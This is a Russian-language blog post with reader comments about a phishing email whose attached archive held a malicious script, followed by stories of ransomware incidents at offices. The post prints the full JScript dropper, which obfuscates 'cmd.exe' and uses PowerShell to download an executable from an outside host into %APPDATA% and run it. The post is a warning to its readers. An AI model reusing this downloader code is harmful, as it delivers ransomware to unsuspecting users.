11:58 

С украинского почтовика пришло слатенькое

lexiff
гомофобная троллолита
Что-то типа "вот подписанный нами акт услуг, давайте ваш р/с, оплатим"
в прикреплении архивчик, антивирь молчит.

Сливаю прикрепление - штатный антивирь говорит - ок.
А внутри архивчика скриптег:

var nazvon = new ActiveXObject("shell.application");

var kww = "assd"

nazvon.ShellExecute (String.fromCharCode(99,109,100,46,101,88,101), "/c Powershell ( ne^w-obje^ct S^yst^em.N^eT.We^bcLi^ent).DoWn^loadF^ile('washingtoniancleaners.com/1990_exe','%APPDATA%\asfbsewgg.exe');Start-Process '%APPDATA%\asfbsewgg.exe'", "", "", 0)

Мне пофиг, а ведь кто-то жмякнет.

@темы: Работа

URL
Комментарии
2016-10-18 в 12:05 

-=necrozed=-
всё, что меня не убивает - делает большую ошибку...
переведи для отдела здравоохранения

2016-10-18 в 12:09 

А вот эту ссылку про фашингтон жмякать можно?

2016-10-18 в 12:16 

.Shamsi.
I will
даа, это очень популярный вид развода, причем они такие названия писем пишут, что и правда бывает очень натурально.

2016-10-18 в 12:20 

fire-dragon
можно внутри какой то инсталер лежит что он устанавливает непонятно.

2016-10-18 в 12:29 

lexiff
гомофобная троллолита
URL
2016-10-18 в 13:02 

Pixi
фор-леди
Так что будет-то?
Нам на работе частенько приходит что-то подобное, живу в тревожном ожидании, что кто-то из бухгалтеров всё-таки нажмёт на файл якобы от Ростелекома.

2016-10-18 в 13:11 

lexiff
гомофобная троллолита
Pixi, Нам на работе частенько приходит что-то подобное, живу в тревожном ожидании, что кто-то из бухгалтеров всё-таки нажмёт на файл якобы от Ростелекома.
Стандартно - шифровальщик файлов.
На моей памяти у меня два раза на работе запустили (спасались суточными бэкапами)
И два раза у сторонних клиентов - вот там был самый настоящий адище.

URL
2016-10-18 в 13:16 

Pixi
фор-леди
lexiff
Понятно, спасибо.
Недавно они нажали на нечто от знакомого корреспондента - но с расширением .js - зашифровать не зашифровало (хотя грозилось), но неубираемый баннер на весь Рабочий стол повесило.

2016-10-18 в 13:43 

m@@nko
Лучше жалеть о том что было, чем о том, что могло бы быть... (с) Грабли манили как морские сирены (с)
Pixi, как-то секретарь у нас такое жмякнул.
зашифровало все, до чего дотянулось, причем гадил на глазах, в которых стояли секретарские слезы.
пропала база с документацией за несколько лет. до сих пор восстанавливают, чо)

2016-10-18 в 19:22 

У меня на (бывшей) работе такое запускали раз пять или шесть, причём три из них - одна и та же сотрудница. Хотя после каждого такого случая я рассылал всем сотрудникам страшное письмо от техотдела с подробным описанием ужасов, несомых подобными штучками, а также подробнейшим, в крупных красочных картинках, разжёвыванием того, как их узнать и не запустить.
И нужные для работы тыщи файлов все упорно хранили вне бэкапящихся папок, а где-то в Е:\МОЕ. Одна даже буквально.

2016-10-18 в 21:20 

Pixi
фор-леди
m@@nko
У нас зашифровало (пока) только один раз: на первой неделе работы новой сотрудницы. Особую пикантность ситуации придавало то, что она устроилась на должность оператора ЭВМ, а фактически программиста (мы бюджетники, нам на 30 компов программист ни один не полагается, только "операторы"). Одно хорошо - ничего важного на той машине накопиться не успело ;)

Маккуро Куроске
причём три из них - одна и та же сотрудница
Ну, это уже за гранью добра и зла :apstenu:

2016-10-18 в 22:08 

Tetroka
Счастье есть. И я есть. И это счастье!
Спасибо за пояснения. А то приходит такое время от времени, удаляю, а самой интересно, что там может такого быть, раз антивирусники не ругаются.

2016-10-19 в 07:59 

Однажды, в местной сети появился вирус, администратор нашёл источник на одной из машин, папка называлась "сволочь". Он был очень удивлён и возмущён названием. После выяснилось, что папка была создана пользователем той машины, "сволочь" было вовсе не сволочью, а глаголом и в неё сбрасывались ненужные файлы для последующего удаления.

Комментирование для вас недоступно.
Для того, чтобы получить возможность комментировать, авторизуйтесь:
 
РегистрацияЗабыли пароль?

Дневник лежебоки-зануды, педанта и крохобора.

главная